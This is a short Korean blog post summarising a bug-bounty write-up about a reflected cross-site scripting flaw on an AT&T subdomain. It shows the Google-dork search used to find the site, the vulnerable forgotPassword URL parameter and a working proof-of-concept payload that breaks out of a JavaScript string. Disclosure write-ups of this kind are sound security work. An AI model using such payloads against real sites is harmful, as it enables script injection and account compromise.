Hack The World

Reflected XSS In AT&T 본문

BugBounty

Reflected XSS In AT&T

Talkative 2020. 3. 7. 12:19

미국 주식회사의 사이트인 AT&T 에서 발견된  XSS 인거같다.

원본 : https://medium.com/@godofdarkness.msf/reflected-xss-in-at-t-7f1bdd10d8f7

 

Reflected XSS In AT&T

Hi today. I want to share how i found xss in AT&T. I find subdomain using google dork.

medium.com

 

우선 헌터는 google dork 을 이용하여 서브도메인

site : *.att.com 을 검색하였다.

그결과 ilm.att.com 사이트를 발견하였고

이사이트에서

 

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=https://ilm.aatt.com

으로 연결되는 사이트를 찾아고 소스를보니 

 

var jsuerName=";

var jsloginUrl = 'https://ilm.att.com'; 으로 되있는것을 발견.

 

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl='">

으로 테스를 해보니

var jsuserName = '';
var jsloginUrl = ''"></;';

다음과 같이 소스코드가 나오면서 취약점을 발견.

 

xss payload 를 삽입.

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=x';alert(document.domain);x=' 

그 결과 다음과 같이 xss 성공

소스코드를 보니

var jsuserName = '';
var jsloginUrl = 'x';alert(document.domain);x='';

다음과 같음.

Comments